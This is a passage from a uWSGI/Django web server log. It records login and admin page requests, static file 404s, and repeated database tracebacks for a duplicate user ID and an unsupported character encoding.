switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 11057|app: 0|req: 773/1022] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 08:37:19 2021] POST /login/ => generated 208453 bytes in 106 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'") +[pid: 11057|app: 0|req: 774/1023] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 08:37:20 2021] POST /login/ => generated 208453 bytes in 165 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 775/1024] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 08:37:27 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 776/1025] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 08:37:27 2021] GET /home/ => generated 7863 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 47098] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 11057|app: 0|req: 777/1026] 180.160.72.163 () {42 vars in 1109 bytes} [Thu Jan 14 08:37:36 2021] GET /publish/ => generated 4739 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 778/1027] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 08:37:36 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 779/1028] 219.228.146.156 () {40 vars in 896 bytes} [Thu Jan 14 08:37:39 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1029] 219.228.146.156 () {42 vars in 880 bytes} [Thu Jan 14 08:37:39 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 11057|app: 0|req: 780/1030] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 08:37:46 2021] POST /login/ => generated 27 bytes in 62 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 781/1031] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 08:37:46 2021] GET /home/ => generated 7863 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 782/1032] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:38:06 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 783/1033] 180.160.72.163 () {42 vars in 1110 bytes} [Thu Jan 14 08:38:08 2021] GET /my-admin => generated 0 bytes in 2 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 784/1034] 180.160.72.163 () {42 vars in 1112 bytes} [Thu Jan 14 08:38:08 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /favicon.ico +[pid: 11057|app: 0|req: 785/1035] 180.160.72.163 () {40 vars in 1028 bytes} [Thu Jan 14 08:38:09 2021] GET /favicon.ico => generated 3480 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 786/1036] 180.160.72.163 () {42 vars in 1107 bytes} [Thu Jan 14 08:38:49 2021] GET /home/ => generated 7863 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 787/1037] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:38:55 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 788/1038] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 08:39:01 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 789/1039] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:39:12 2021] POST /login/ => generated 82 bytes in 6 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 790/1040] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 08:39:13 2021] POST /login/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 791/1041] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 08:39:14 2021] GET /home/ => generated 7869 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 792/1042] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:39:21 2021] POST /login/ => generated 82 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 793/1043] 180.160.72.163 () {42 vars in 1112 bytes} [Thu Jan 14 08:39:26 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 11057|app: 0|req: 794/1044] 180.160.72.163 () {40 vars in 1028 bytes} [Thu Jan 14 08:39:26 2021] GET /favicon.ico => generated 3480 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 795/1045] 180.160.72.163 () {48 vars in 1170 bytes} [Thu Jan 14 08:39:38 2021] POST /my-admin/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 796/1046] 180.160.72.163 () {42 vars in 1117 bytes} [Thu Jan 14 08:39:39 2021] GET /admin-home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 797/1047] 180.160.72.163 () {42 vars in 1119 bytes} [Thu Jan 14 08:39:39 2021] GET /admin-home/ => generated 6515 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1048] 180.160.72.163 () {40 vars in 1070 bytes} [Thu Jan 14 08:39:39 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1049] 180.160.72.163 () {40 vars in 1004 bytes} [Thu Jan 14 08:39:39 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1050] 180.160.72.163 () {40 vars in 1016 bytes} [Thu Jan 14 08:39:39 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1051] 180.160.72.163 () {40 vars in 1033 bytes} [Thu Jan 14 08:39:39 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1052] 180.160.72.163 () {40 vars in 985 bytes} [Thu Jan 14 08:39:39 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1053] 180.160.72.163 () {40 vars in 1045 bytes} [Thu Jan 14 08:39:39 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1054] 180.160.72.163 () {40 vars in 1009 bytes} [Thu Jan 14 08:39:39 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1055] 180.160.72.163 () {40 vars in 1051 bytes} [Thu Jan 14 08:39:39 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1056] 180.160.72.163 () {40 vars in 997 bytes} [Thu Jan 14 08:39:40 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1057] 180.160.72.163 () {40 vars in 1073 bytes} [Thu Jan 14 08:39:40 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1058] 180.160.72.163 () {40 vars in 995 bytes} [Thu Jan 14 08:39:40 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1059] 180.160.72.163 () {40 vars in 1069 bytes} [Thu Jan 14 08:39:40 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 798/1060] 180.160.72.163 () {40 vars in 1086 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 799/1061] 180.160.72.163 () {40 vars in 1074 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 800/1062] 180.160.72.163 () {40 vars in 1078 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 801/1063] 180.160.72.163 () {40 vars in 1042 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 802/1064] 180.160.72.163 () {40 vars in 1062 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 803/1065] 180.160.72.163 () {40 vars in 1062 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 804/1066] 180.160.72.163 () {40 vars in 1118 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 805/1067] 180.160.72.163 () {40 vars in 1010 bytes} [Thu Jan 14 08:39:42 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 806/1068] 180.160.72.163 () {40 vars in 1008 bytes} [Thu Jan 14 08:39:43 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 807/1069] 180.160.72.163 () {42 vars in 1121 bytes} [Thu Jan 14 08:39:48 2021] GET /kind-manage => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 808/1070] 180.160.72.163 () {42 vars in 1123 bytes} [Thu Jan 14 08:39:48 2021] GET /kind-manage/ => generated 8283 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 809/1071] 180.160.72.163 () {40 vars in 1075 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 810/1072] 180.160.72.163 () {40 vars in 1087 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 811/1073] 180.160.72.163 () {40 vars in 1043 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 813/1074] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 814/1075] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 814/1076] 180.160.72.163 () {40 vars in 1079 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 26 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 815/1077] 180.160.72.163 () {40 vars in 1009 bytes} [Thu Jan 14 08:39:48 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 816/1078] 180.160.72.163 () {40 vars in 1007 bytes} [Thu Jan 14 08:39:48 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 817/1079] 180.160.72.163 () {40 vars in 1118 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in 